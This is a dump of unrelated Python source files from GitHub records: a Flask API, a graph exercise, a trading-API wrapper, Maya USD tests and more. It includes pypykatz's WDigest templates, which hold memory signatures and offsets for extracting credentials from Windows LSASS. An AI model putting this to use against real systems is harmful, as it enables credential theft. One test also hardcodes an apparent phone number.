request.args.get('limit'):\n _limit = int(request.args.get('limit'))\n result = {\n \"result\": clf.classify(image_instance)[:_limit]\n }\n return jsonify(result), 200","repo_name":"razeone/flask-darknet","sub_path":"rest_darknet/views/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20123883252","text":"#!/usr/bin/env python3\n#\n# Author:\n# Tamas Jos (@skelsec)\n#\n\n#import io\n#from minidump.win_datatypes import *\nfrom pypykatz.commons.common import KatzSystemArchitecture, WindowsBuild, WindowsMinBuild\nfrom pypykatz.commons.win_datatypes import LUID, ULONG, POINTER\nfrom pypykatz.lsadecryptor.package_commons import PackageTemplate\n\nclass WdigestTemplate(PackageTemplate):\n\tdef __init__(self):\n\t\tsuper().__init__('Wdigest')\n\t\tself.signature = None\n\t\tself.first_entry_offset = None\n\t\tself.list_entry = None\n\t\tself.primary_offset = None\n\t\n\t@staticmethod\n\tdef get_template(sysinfo):\n\t\ttemplate = WdigestTemplate()\n\n\t\tif sysinfo.architecture == KatzSystemArchitecture.X64:\n\t\t\tif WindowsMinBuild.WIN_XP.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_2K3.value:\n\t\t\t\ttemplate.signature = b'\\x48\\x3b\\xda\\x74'\n\t\t\t\ttemplate.first_entry_offset = -4\n\t\t\t\ttemplate.primary_offset = 36\n\t\t\t\ttemplate.list_entry = PWdigestListEntry\n\t\t\t\t\n\t\t\telif WindowsMinBuild.WIN_2K3.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_VISTA.value:\n\t\t\t\ttemplate.signature = b'\\x48\\x3b\\xda\\x74'\n\t\t\t\ttemplate.first_entry_offset = -4\n\t\t\t\ttemplate.primary_offset = 48\n\t\t\t\ttemplate.list_entry = PWdigestListEntry\n\n\t\t\telif sysinfo.buildnumber >= WindowsMinBuild.WIN_VISTA.value:\n\t\t\t\ttemplate.signature = b'\\x48\\x3b\\xd9\\x74'\n\t\t\t\ttemplate.first_entry_offset = -4\n\t\t\t\ttemplate.primary_offset = 48\n\t\t\t\ttemplate.list_entry = PWdigestListEntry\n\t\t\t\t\n\t\t\telse:\n\t\t\t\traise Exception('Could not identify template! Architecture: %s sysinfo.buildnumber: %s' % (sysinfo.architecture, sysinfo.buildnumber))\n\t\t\t\n\t\t\n\t\telif sysinfo.architecture == KatzSystemArchitecture.X86:\n\t\t\tif WindowsMinBuild.WIN_XP.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_2K3.value:\n\t\t\t\ttemplate.signature = b'\\x74\\x18\\x8b\\x4d\\x08\\x8b\\x11'\n\t\t\t\ttemplate.first_entry_offset = -6\n\t\t\t\ttemplate.primary_offset = 36\n\t\t\t\ttemplate.list_entry = PWdigestListEntryNT5\n\n\t\t\telif WindowsMinBuild.WIN_2K3.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_VISTA.value:\n\t\t\t\ttemplate.signature = b'\\x74\\x18\\x8b\\x4d\\x08\\x8b\\x11'\n\t\t\t\ttemplate.first_entry_offset = -6\n\t\t\t\ttemplate.primary_offset = 28\n\t\t\t\ttemplate.list_entry = PWdigestListEntryNT5\n\t\t\t\t\t\t\t\t\n\t\t\telif WindowsMinBuild.WIN_VISTA.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_BLUE.value:\n\t\t\t\ttemplate.signature = b'\\x74\\x11\\x8b\\x0b\\x39\\x4e\\x10'\n\t\t\t\ttemplate.first_entry_offset = -6\n\t\t\t\ttemplate.primary_offset = 32\n\t\t\t\ttemplate.list_entry = PWdigestListEntry\n\t\t\t\t\n\t\t\telif WindowsMinBuild.WIN_BLUE.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_10.value:\n\t\t\t\ttemplate.signature = b'\\x74\\x15\\x8b\\x0a\\x39\\x4e\\x10'\n\t\t\t\ttemplate.first_entry_offset = -4\n\t\t\t\ttemplate.primary_offset = 32\n\t\t\t\ttemplate.list_entry = PWdigestListEntry\n\t\t\t\n\t\t\telif WindowsMinBuild.WIN_10.value <= sysinfo.buildnumber < WindowsBuild.WIN_10_1809.value:\n\t\t\t\ttemplate.signature = b'\\x74\\x15\\x8b\\x0a\\x39\\x4e\\x10'\n\t\t\t\ttemplate.first_entry_offset = -6\n\t\t\t\ttemplate.primary_offset = 32\n\t\t\t\ttemplate.list_entry = PWdigestListEntry\n\t\t\t\t\n\t\t\telse: # sysinfo.buildnumber >= WindowsBuild.WIN_10_1809:\n\t\t\t\ttemplate.signature = b'\\x74\\x15\\x8b\\x17\\x39\\x56\\x10'\n\t\t\t\ttemplate.first_entry_offset = -6\n\t\t\t\ttemplate.primary_offset = 32\n\t\t\t\ttemplate.list_entry = PWdigestListEntry\n\t\t\n\t\telse:\n\t\t\traise Exception('Unknown architecture! %s' % sysinfo.architecture)\n\t\t\n\t\ttemplate.log_template('list_entry', template.list_entry)\n\t\treturn template\n\t\n\nclass PWdigestListEntry(POINTER):\n\tdef __init__(self, reader):\n\t\tsuper().__init__(reader, WdigestListEntry)\n\t\t\nclass PWdigestListEntryNT5(POINTER):\n\tdef __init__(self, reader):\n\t\tsuper().__init__(reader, WdigestListEntryNT5)\n\t\t\nclass WdigestListEntryNT5:\n\tdef __init__(self, reader):\n\t\tself.Flink = PWdigestListEntryNT5(reader)\n\t\tself.Blink = PWdigestListEntryNT5(reader)\n\t\tself.this_entry = PWdigestListEntryNT5(reader)\n\t\tself.usage_count = ULONG(reader)\n\t\treader.align() #8?\n\t\tself.luid = LUID(reader).value\n\n\nclass WdigestListEntry:\n\tdef __init__(self, reader):\n\t\tself.Flink = PWdigestListEntry(reader)\n\t\tself.Blink = PWdigestListEntry(reader)\n\t\tself.usage_count = ULONG(reader)\n\t\treader.align() #8?\n\t\tself.this_entry = PWdigestListEntry(reader)\n\t\tself.luid = LUID(reader).value","repo_name":"skelsec/pypykatz","sub_path":"pypykatz/lsadecryptor/packages/wdigest/templates.py","file_name":"templates.py","file_ext":"py","file_size_in_byte":4154,"program_lang":"python","lang":"en","doc_type":"code","stars":2505,"dataset":"github-code","pt":"53"} +{"seq_id":"13179653632","text":"def main():\n with open(\"./test_input.txt\", \"r\") as file:\n crabs = [int(x) for x in file.readline().split(\",\")]\n\n least_fuel = None\n for position in range(0, max(crabs) + 1):\n current_fuel = 0\n for i in crabs:\n current_fuel += abs(i - position)\n if least_fuel == None or current_fuel < least_fuel:\n least_fuel = current_fuel\n print(least_fuel)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"anacantanhede/advent_of_code_2021","sub_path":"source/exercise_7/swarm_1.py","file_name":"swarm_1.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38903615179","text":"\r\nclass Graph:\r\n def __init__(self, edges):\r\n \r\n self.adjList = {}\r\n \r\n for (src, dest, weight) in edges:\r\n if src in self.adjList:\r\n self.adjList[src].append((dest, weight))\r\n else:\r\n self.adjList[src] = [(dest, weight)]\r\n \r\n # print(\"Graph:\", self.adjList)\r\n\r\n def distanceOfRoute(self, routes):\r\n if(self.isRouteExists(routes) == False):\r\n return 'NO SUCH ROUTE'\r\n\r\n distance = 0\r\n routes = list(routes)\r\n length = len(routes)\r\n for vertex in range(length-1):\r\n src = routes[vertex]\r\n end = routes[vertex+1]\r\n edge = self.adjList.get(src)\r\n for e in edge:\r\n if(e[0] == end):\r\n distance += e[1]\r\n\r\n return distance\r\n\r\n def numberOfRoutesWithDistanceLess(self, src, end, maxDistance=30):\r\n noOfRoutes = 0\r\n \r\n nodes = self.adjList.get(src)\r\n newPaths = []\r\n for node in nodes:\r\n paths = self.getPaths(node[0], end)\r\n for path in paths:\r\n path = [src] + path\r\n newPaths.append(path)\r\n \r\n distances = []\r\n for paths in newPaths:\r\n distances.append(self.distanceOfRoute(\"\".join(paths)))\r\n\r\n noOfRoutes = 0\r\n for d1 in distances:\r\n if(d1 < maxDistance):\r\n noOfRoutes += 1\r\n for d2 in distances:\r\n if(d1+d2 < maxDistance):\r\n noOfRoutes += 1\r\n\r\n\r\n for d1 in distances:\r\n sum = d1 + d1 + d1\r\n while(sum < maxDistance):\r\n noOfRoutes += 1\r\n sum += d1\r\n\r\n return noOfRoutes\r\n\r\n def isRouteExists(self, routes):\r\n routes = list(routes)\r\n length = len(routes)\r\n for vertex in range(length-1):\r\n src = routes[vertex]\r\n end = routes[vertex+1]\r\n edge = self.adjList.get(src)\r\n valid = False\r\n for e in edge:\r\n if(e[0] == end):\r\n valid = True\r\n if(valid == False):\r\n return False\r\n\r\n return True\r\n\r\n def getPaths(self, src, end, path=[]):\r\n path = path + [src]\r\n\r\n if src == end:\r\n return [path]\r\n\r\n if src not in self.adjList:\r\n return []\r\n\r\n paths = []\r\n\r\n for node in self.adjList[src]:\r\n if node[0] not in path:\r\n newPaths = self.getPaths(node[0], end, path)\r\n for p in newPaths:\r\n paths.append(p)\r\n\r\n return paths\r\n \r\n def getPathsExactLength(self, src, end, path=[], steps=0):\r\n path = path + [src]\r\n\r\n if (src == end and steps == 4):\r\n return [path]\r\n\r\n if(steps > 4):\r\n return []\r\n\r\n if src not in self.adjList:\r\n return []\r\n\r\n paths = []\r\n\r\n for node in self.adjList[src]:\r\n newPaths = self.getPathsExactLength(node[0], end, path, steps+1)\r\n for p in newPaths:\r\n paths.append(p)\r\n\r\n return paths\r\n \r\n \r\n\r\n def numberOfTripsWithMaximumSteps(self, src, end, maxSteps):\r\n noOfTrips = 0\r\n nodes = self.adjList.get(src)\r\n trips = []\r\n\r\n for n in nodes:\r\n trips.append(self.getPaths(n[0], end))\r\n\r\n for trip in trips:\r\n for t in trip:\r\n if(len(t) <= maxSteps):\r\n noOfTrips += 1\r\n\r\n return noOfTrips\r\n\r\n def numberOfTripsWithExactlySteps(self, src, end, exactSteps):\r\n\r\n paths = self.getPathsExactLength(src, end)\r\n\r\n return len(paths)\r\n\r\n def shortestRouteLength(self, src, end):\r\n \r\n path = self.BFS_SP(src, end)\r\n distance = 0\r\n length = len(path)\r\n for vertex in range(length-1):\r\n src = path[vertex]\r\n end = path[vertex+1]\r\n edge = self.adjList.get(src)\r\n for e in edge:\r\n if(e[0] == end):\r\n distance += e[1]\r\n\r\n return distance\r\n\r\n def BFS_SP(self, start, end):\r\n explored = []\r\n queue = [[start]]\r\n \r\n while queue:\r\n path = queue.pop(0)\r\n node = path[-1]\r\n \r\n if node not in explored:\r\n neighbours = self.adjList[node]\r\n \r\n for neighbour in neighbours:\r\n new_path = list(path)\r\n new_path.append(neighbour[0])\r\n queue.append(new_path)\r\n \r\n if neighbour[0] == end:\r\n return new_path\r\n\r\n explored.append(node)\r\n \r\n return\r\n \r\n \r\nif __name__ == '__main__':\r\n \r\n # Graph: AB5, BC4, CD8, DC8, DE6, AD5, CE2, EB3, AE7\r\n edges = [\r\n ('A', 'B', 5),\r\n ('B', 'C', 4),\r\n ('C', 'D', 8),\r\n ('D', 'C', 8),\r\n ('D', 'E', 6),\r\n ('A', 'D', 5),\r\n ('C', 'E', 2),\r\n ('E', 'B', 3),\r\n ('A', 'E', 7)\r\n ]\r\n \r\n graph = Graph(edges)\r\n\r\n \r\n distance = graph.distanceOfRoute('ABC')\r\n print(f\"Output #1: {distance}\")\r\n\r\n distance = graph.distanceOfRoute('AD')\r\n print(f\"Output #2: {distance}\")\r\n\r\n distance = graph.distanceOfRoute('ADC')\r\n print(f\"Output #3: {distance}\")\r\n\r\n distance = graph.distanceOfRoute('AEBCD')\r\n print(f\"Output #4: {distance}\")\r\n\r\n distance = graph.distanceOfRoute('AED')\r\n print(f\"Output #5: {distance}\")\r\n\r\n numOfTrips = graph.numberOfTripsWithMaximumSteps('C', 'C', 3)\r\n print(f\"Output #6: {numOfTrips}\")\r\n\r\n numOfTrips = graph.numberOfTripsWithExactlySteps('A', 'C', 4)\r\n print(f\"Output #7: {numOfTrips}\")\r\n\r\n distance = graph.shortestRouteLength('A','C')\r\n print(f\"Output #8: {distance}\")\r\n\r\n distance = graph.shortestRouteLength('B','B')\r\n print(f\"Output #9: {distance}\")\r\n\r\n routes = graph.numberOfRoutesWithDistanceLess('C','C', 30)\r\n print(f\"Output #10: {routes}\")\r\n","repo_name":"nellybella/Take-Home-Assignment","sub_path":"Trains.py","file_name":"Trains.py","file_ext":"py","file_size_in_byte":6151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31349974172","text":"import json\r\nj=json.load(open('cat.json'))\r\nprint(j['data'].keys())\r\nans={}\r\nfor i,(name,value) in enumerate(j['data'].items()):\r\n newname=f'category {i}'\r\n print(newname,name)\r\n ans[newname]=value\r\nans2={'data':ans}\r\n\r\nopen('cat_anon.json','w').write(json.dumps({'data':ans},indent=4))","repo_name":"yigalirani/chart","sub_path":"anon.py","file_name":"anon.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10740708703","text":"class Solution:\n def merge(self, intervals: List[List[int]]) -> List[List[int]]:\n intervals.sort(key=lambda x:x[0])\n print(intervals)\n res = [intervals[0]]\n for i in intervals[1:]:\n v = res[-1]\n if i[0] <= v[1]:\n res.pop()\n i\n res.append([min(i[0],v[0]),max(v[1],i[1])])\n else:\n res.append(i)\n print(res)\n return res\n ","repo_name":"princeamitlali/leet_code","sub_path":"0056-merge-intervals/0056-merge-intervals.py","file_name":"0056-merge-intervals.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42977431924","text":"# coidng=utf-8\nimport requests,json,urllib3\nfrom urllib3.exceptions import InsecureRequestWarning,InsecurePlatformWarning\nclass reqs(object):\n def __init__(self,url, pram, fangshi):\n self.url = url\n self.pram = pram\n self.fangshi = fangshi\n\n def testapi(self):\n if self.fangshi == \"POST\":\n self.pram = json.loads(self.pram)\n urllib3.disable_warnings(InsecureRequestWarning)\n r = requests.post(self.url,json=self.pram,verify=False)\n json_response = json.loads(r.text)\n code = json_response[\"code\"]\n return code, json_response\n\nif __name__==\"__main__\":\n a=reqs(\"https://sports-qa.lifesense.com/sms_service/verify/send_code_v3?requestId=1000&sessionId=nosession\",'{\"code\":\"0zys\",\"mobile\":\"13662673020\"}','POST')\n print(a.testapi())\n\n","repo_name":"qinghuanhuana/pydj","sub_path":"denglu/Fzqingqiu.py","file_name":"Fzqingqiu.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28694478761","text":"# type: ignore\n\"\"\"Base class for trading APIs.\"\"\"\nimport collections\nfrom typing import Any, Dict, List\n\nimport ib_insync as ibin\n\n\nclass IbApi:\n \"\"\"Class for interactive broker API.\n\n This class use the package ib-insync for making asynchronous requests toward\n interactive broker trading work station (TWS) api.\n For reference of TWS, please see :\n https://interactivebrokers.github.io/tws-api/index.html\n and for ib-insync\n https://rawgit.com/erdewit/ib_insync/master/docs/html/readme.html\n \"\"\"\n\n def __init__(self) -> None:\n \"\"\"Class initialization function.\"\"\"\n self.ib = ibin.ib.IB()\n self.ib.connect(\"127.0.0.1\", 4002, clientId=13) # Ports\n\n def get_account(self, **kwargs: Any) -> Dict:\n \"\"\"Get the accounts associated with login.\"\"\"\n accounts_summaries = self.ib.accountSummary()\n\n account = {}\n for account_summary in accounts_summaries:\n if account_summary.account != \"ALL\":\n tag = account_summary.tag\n value = account_summary.value\n account[tag] = value\n\n self.account = account\n\n return account\n\n def submit_order(\n self,\n symbol: str,\n qty: int,\n side: str,\n type: str,\n limit_price: float = None,\n stop_price: float = None,\n **kwargs: Any\n ) -> Dict:\n \"\"\"Create and submit an order.\n\n Args:\n symbol: symbol or asset ID\n qty: quantity of shares to be bought or sold\n side: order side, can be \"SELL\" or \"BUY\"\n type: order type, can be one of \"MKT\" (Market), \"LMT\" (Limit),\n \"STP\" (Stop) or \"STP_LIMIT\" (stop limit)\n limit_price: the limit price\n stop_price: the stop price\n **kwargs: Arbitrary keyword arguments, among them for instance:\n currency (str = \"USD\"): the currency in which to place the order\n\n Returns:\n Dict: A list containing the order, based of trade object.\n \"\"\"\n # Initialize default kwargs if necessary\n if \"currency\" not in kwargs:\n currency = \"USD\"\n else:\n currency = kwargs[\"currency\"]\n\n # Define order according to dict\n order_dict = {\n \"STP LMT\": {\n \"orderType\": type,\n \"totalQuantity\": qty,\n \"auxPrice\": stop_price,\n \"lmtPrice\": limit_price,\n \"action\": side,\n },\n \"STP\": {\n \"orderType\": type,\n \"totalQuantity\": qty,\n \"auxPrice\": stop_price,\n \"action\": side,\n },\n \"LMT\": {\n \"orderType\": type,\n \"totalQuantity\": qty,\n \"lmtPrice\": limit_price,\n \"action\": side,\n },\n \"MKT\": {\"orderType\": type, \"totalQuantity\": qty, \"action\": side},\n }\n order_definition = collections.OrderedDict(order_dict[type]) # mypy workaround\n\n order = ibin.Order(**order_definition) # Place order\n\n # Define contract (which asset being traded)\n contract = ibin.Stock(symbol=symbol, exchange=\"SMART\", currency=currency)\n\n # Place order, send request\n trade = self.ib.placeOrder(contract=contract, order=order)\n\n # Confirm submission\n self.ib.sleep(2)\n assert order in self.ib.orders()\n\n trade_dict = trade.__dict__\n\n return trade_dict\n\n def list_orders(self, **kwargs: Any) -> List[Dict]:\n \"\"\"Get a list with all orders.\"\"\"\n open_orders_dict = [x.__dict__ for x in self.ib.reqAllOpenOrders()]\n\n return open_orders_dict\n\n def get_order(self, order_id: str, **kwargs: Any) -> Dict:\n \"\"\"Get an order with specific order_id.\"\"\"\n open_orders = self.ib.reqAllOpenOrders()\n for order in open_orders:\n if order.permId == int(order_id): # Order id is unique\n order_dict = order.__dict__\n\n if \"order_dict\" not in locals():\n print(\"Order doesn't exist!\")\n order_dict = {}\n\n return order_dict\n\n def cancel_order(self, order_id: str, **kwargs: Any) -> Dict:\n \"\"\"Cancel an order with specific order_id.\"\"\"\n open_orders = self.ib.reqAllOpenOrders()\n for order in open_orders:\n if order.permId == int(order_id): # Order id is unique\n trade = self.ib.cancelOrder(order)\n trade_dict = trade.__dict__\n if \"trade_dict\" not in locals():\n print(\"Order doesn't exist!\")\n trade_dict = {}\n\n return trade_dict\n\n def cancel_all_orders(self, **kwargs: Any) -> List[Dict]:\n \"\"\"Cancel all orders.\"\"\"\n cancelled_orders = []\n open_orders = self.ib.reqAllOpenOrders()\n for order in open_orders:\n trade = self.ib.cancelOrder(order)\n trade_dict = trade.__dict__\n cancelled_orders.append(trade_dict)\n\n return cancelled_orders\n\n def list_positions(self, **kwargs: Any) -> List[Dict]:\n \"\"\"Get a list of open positions.\"\"\"\n positions = []\n for x in range(0, len(self.ib.positions())):\n positions.append(\n {\n \"account\": self.ib.positions()[x].account,\n \"contract\": self.ib.positions()[x].contract.__dict__,\n \"quantity\": self.ib.positions()[x].position,\n \"avgCost\": self.ib.positions()[x].avgCost,\n }\n )\n return positions\n\n def get_position(self, symbol: str, **kwargs: Any) -> Dict:\n \"\"\"Get an open position for a symbol.\"\"\"\n positions = self.list_positions()\n\n for x in positions:\n if x[\"contract\"][\"symbol\"] == symbol:\n position = x\n\n if \"position\" not in locals():\n print(\"Position for symbol doesn't exist!\")\n position = {}\n\n return position\n\n def close_position(self, symbol: str, **kwargs: Any) -> Dict:\n \"\"\"Liquidates the position for the given symbol at market price.\"\"\"\n for x in range(0, len(self.ib.positions())):\n if self.ib.positions()[x].contract.symbol == symbol:\n old_contract = self.ib.positions()[x].contract\n position = self.ib.positions()[x].position\n\n if \"position\" not in locals():\n print(\"Position for symbol doesn't exist!\")\n return {}\n\n # Define sell contract according to current contract/position\n new_contract = ibin.Stock(conId=old_contract.conId)\n self.ib.qualifyContracts(new_contract) # Validates the contract\n\n # Place an order using a contract and order object.\n order = ibin.MarketOrder(\"SELL\", position)\n trade = self.ib.placeOrder(contract=new_contract, order=order)\n assert order in self.ib.orders()\n\n return trade.__dict__\n\n def close_all_positions(self, **kwargs: Any) -> List[Dict]:\n \"\"\"Liquidates all open positions at market price.\"\"\"\n closed_positions = []\n for x in range(0, len(self.ib.positions())):\n old_contract = self.ib.positions()[x].contract\n position = self.ib.positions()[x].position\n\n if \"position\" not in locals():\n print(\"No positions to close!\")\n return [{}]\n\n # Define sell contract according to current contract/position\n new_contract = ibin.Stock(conId=old_contract.conId)\n self.ib.qualifyContracts(new_contract) # Validates the contract\n\n # Place an order using a contract and order object.\n order = ibin.order.MarketOrder(\"SELL\", position)\n trade = self.ib.placeOrder(new_contract, order)\n\n closed_positions.append(trade.__dict__)\n\n return closed_positions\n","repo_name":"paaliaq/tradingapi","sub_path":"src/tradingapi/ib/ib_api.py","file_name":"ib_api.py","file_ext":"py","file_size_in_byte":7905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1241915102","text":"import cv2\nimport numpy as np \nimage=cv2.imread('01.jpg',cv2.IMREAD_COLOR)\nroi=image[100:500,100:500]\n#image[100:500,100:500] [255,255,255]\n#print(roi)\ncv2.imshow('image',image)\ncv2.imshow('roi',roi)\ncv2.waitKey(0)\ncv2.destroyAllWindows() ","repo_name":"mu7ammad-3li/learning_opencv","sub_path":"04-image-operations.py","file_name":"04-image-operations.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"10109274178","text":"import os\nimport unittest\n\nfrom maya import cmds\nfrom maya import standalone\n\nfrom pxr import Usd\nfrom pxr import UsdGeom\n\n\nclass testUsdExportMesh(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n standalone.initialize('usd')\n\n cmds.file(os.path.abspath('UsdExportMeshTest.ma'), open=True,\n force=True)\n\n cmds.loadPlugin('pxrUsd', quiet=True)\n\n @classmethod\n def tearDownClass(cls):\n standalone.uninitialize()\n\n def testExportAsCatmullClark(self):\n usdFile = os.path.abspath('UsdExportMesh_catmullClark.usda')\n cmds.usdExport(mergeTransformAndShape=True, file=usdFile,\n shadingMode='none', defaultMeshScheme='catmullClark')\n\n stage = Usd.Stage.Open(usdFile)\n\n m = UsdGeom.Mesh.Get(stage, '/UsdExportMeshTest/poly')\n self.assertEqual(m.GetSubdivisionSchemeAttr().Get(), UsdGeom.Tokens.none)\n self.assertTrue(len(m.GetNormalsAttr().Get()) > 0)\n\n m = UsdGeom.Mesh.Get(stage, '/UsdExportMeshTest/polyNoNormals')\n self.assertEqual(m.GetSubdivisionSchemeAttr().Get(), UsdGeom.Tokens.none)\n self.assertTrue(not m.GetNormalsAttr().Get())\n\n m = UsdGeom.Mesh.Get(stage, '/UsdExportMeshTest/subdiv')\n self.assertEqual(m.GetSubdivisionSchemeAttr().Get(), UsdGeom.Tokens.catmullClark)\n self.assertTrue(not m.GetNormalsAttr().Get())\n\n m = UsdGeom.Mesh.Get(stage, '/UsdExportMeshTest/unspecified')\n self.assertEqual(m.GetSubdivisionSchemeAttr().Get(), UsdGeom.Tokens.catmullClark)\n self.assertTrue(not m.GetNormalsAttr().Get())\n\n def testExportAsPoly(self):\n usdFile = os.path.abspath('UsdExportMesh_none.usda')\n cmds.usdExport(mergeTransformAndShape=True, file=usdFile,\n shadingMode='none', defaultMeshScheme='none')\n\n stage = Usd.Stage.Open(usdFile)\n\n m = UsdGeom.Mesh.Get(stage, '/UsdExportMeshTest/unspecified')\n self.assertEqual(m.GetSubdivisionSchemeAttr().Get(), UsdGeom.Tokens.none)\n self.assertTrue(len(m.GetNormalsAttr().Get()) > 0)\n\n # XXX: For some reason, when the mesh export used the getNormal()\n # method on MItMeshFaceVertex, we would sometimes get incorrect normal\n # values. Instead, we had to get all of the normals off of the MFnMesh\n # and then use the iterator's normalId() method to do a lookup into the\n # normals.\n # This test ensures that we're getting correct normals. The mesh should\n # only have normals in the x or z direction.\n\n m = UsdGeom.Mesh.Get(stage, '/UsdExportMeshTest/TestNormalsMesh')\n normals = m.GetNormalsAttr().Get()\n self.assertTrue(normals)\n for n in normals:\n # we don't expect the normals to be pointed in the y-axis at all.\n self.assertAlmostEqual(n[1], 0.0, delta=1e-4)\n\n # make sure the other 2 values aren't both 0.\n self.assertNotAlmostEqual(abs(n[0]) + abs(n[2]), 0.0, delta=1e-4)\n\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","repo_name":"JosephTom/PixarUSD","sub_path":"third_party/maya/lib/usdMaya/testenv/testUsdExportMesh.py","file_name":"testUsdExportMesh.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"30555668235","text":"from turtle import *\n# 绘制斐波那契螺旋线1,1,2,3,5,8,13\ndef draw_square(r):\n penup()\n for _ in range(4):\n fd(r)\n left(90)\n pendown()\n circle(r, 90)\n return\n\ns = 0.618\nr = 50\nspeed()\nif __name__ == '__main__':\n for i in range(5):\n draw_square(r)\n r /= s\n done()\n","repo_name":"opollopo/GeekYangYuanyuzhe","sub_path":"254/luoxuan.py","file_name":"luoxuan.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24313794926","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING, Literal\n\nif TYPE_CHECKING:\n from collections.abc import Sequence\n\n\nclass MetaData:\n def _warn_unmatch(\n self,\n total_identifiers: int,\n unmatched_identifiers: Sequence[str],\n query_id: str,\n reference_id: str,\n metadata_type: Literal[\n \"cell line\",\n \"protein expression\",\n \"bulk RNA\",\n \"drug response\",\n \"moa\",\n \"compound\",\n ] = \"cell line\",\n verbosity: int | str = 5,\n ) -> None:\n \"\"\"Helper function to print out the unmatched identifiers.\n\n Args:\n total_identifiers: The total number of identifiers in the `adata` object.\n unmatched_identifiers: Unmatched identifiers in the `adata` object.\n query_id: The column of `.obs` with cell line information.\n reference_id: The type of cell line identifier in the meta data.\n metadata_type: The type of metadata where some identifiers are not matched during annotation, cell line, protein expression, bulk RNA expression, drug response, moa or compound. Defaults to \"cell line\".\n verbosity: The number of unmatched identifiers to print, can be either non-negative values or \"all\". Defaults to 5.\n \"\"\"\n if isinstance(verbosity, str):\n if verbosity != \"all\":\n raise ValueError(\"Only a non-negative value or 'all' is accepted.\")\n else:\n verbosity = len(unmatched_identifiers)\n\n if len(unmatched_identifiers) == total_identifiers:\n hint = \"\"\n if metadata_type in [\"protein expression\", \"bulk RNA\", \"drug response\"]:\n hint = \"Additionally, call the `CellLineMetaData.annotate()` function to acquire more possible query IDs that can be used for cell line annotation purposes.\"\n raise ValueError(\n f\"Attempting to match the query id {query_id} in 'adata.obs' to the reference id {reference_id} in the metadata.\\n\"\n \"However, none of the query IDs could be found in the {metadata_type} annotation data.\\n\"\n \"To resolve this issue, call the `lookup()` function to create a LookUp object.\\n\"\n \"This enables obtaining the count of matched identifiers in the AnnData object for different types of reference and query IDs.\\n\"\n f\"{hint}\"\n )\n if len(unmatched_identifiers) == 0:\n return\n if isinstance(verbosity, int) and verbosity >= 0:\n verbosity = min(verbosity, len(unmatched_identifiers))\n if verbosity > 0:\n print(\n f\"[bold blue]There are {total_identifiers} identifiers in `adata.obs`.\"\n f\"However, {len(unmatched_identifiers)} identifiers can't be found in the {metadata_type} annotation,\"\n \"leading to the presence of NA values for their respective metadata.\\n\",\n \"Please check again: \",\n *unmatched_identifiers[:verbosity],\n \"...\",\n sep=\"\\n- \",\n )\n else:\n raise ValueError(\"Only 'all' or a non-negative value is accepted.\")\n","repo_name":"ONERAI/pertpy","sub_path":"pertpy/metadata/_metadata.py","file_name":"_metadata.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"17739913744","text":"class Node:\n def __init__(self, data=None, next=None):\n self.data=data\n self.next=next\nclass LinkedList:\n def __init__(self):\n self.head=None\n\n def insert_at_begin(self,data):\n node=Node(data,self.head)\n self.head= node\n\n def print(self):\n if self.head is None: #blank linked list\n print(\"Linked list is empty\")\n return \n itr = self.head #linked list is not blank ,assigning head to the temporary variable\n llstr = '' #linkedlist string\n while itr: \n llstr += str(itr.data)+'---->' #appending the data to the string \n itr=itr.next #following the link in the linked list \n print(llstr)\n\n\n def insert_End(self, data):\n if self.head is None: #blank linked list\n self.head = Node(data, None) #assign head to created node\n return \n itr = self.head\n while itr.next :\n itr=itr.next\n itr.next=Node(data,None) #next of last element is null , so creating a new node \n\n def insert_values(self, data_list):\n self.head = None\n for data in data_list:\n self.insert_End(data)\n\n def get_length(self):\n count=0\n itr=self.head #iterator pointing at the head\n while itr: #iterator is not none\n count=count+1 \n itr=itr.next\n return count \n\n def remove_at(self,index):\n if index<0 or index>= self.get_length(): #if index is negative or more than the lenght\n raise Exception(\"Invalid index\")\n if index==0: #index is 0, i.e., Pointing to head\n self.head = self.head.next\n return \n count=0 #count to reach the given index\n itr = self.head\n while itr:\n if count==index-1:#we need to stop the element prior element that we want to remove and we need to modify the links\n itr.next=itr.next.next #modifying the links\n break \n itr=itr.next\n count+=1\n \n def insert_at(self,index, data):\n if index<0 or index>= self.get_length(): #if index is negative or more than the lenght\n raise Exception(\"Invalid index\")\n if index==0:\n self.insert_at_begin(data)\n return \n count=0\n itr=self.head\n while itr:\n if count==index-1: #stoppinfg at the previous element to modify the link \n node = Node(data,itr.next) #creating the node to insert at that index\n itr.next=node\n break\n itr=itr.next\n count=count+1\n\n\n\n\nif __name__ == '__main__':\n ll= LinkedList()\n #ll.insert_at_begin(5)\n 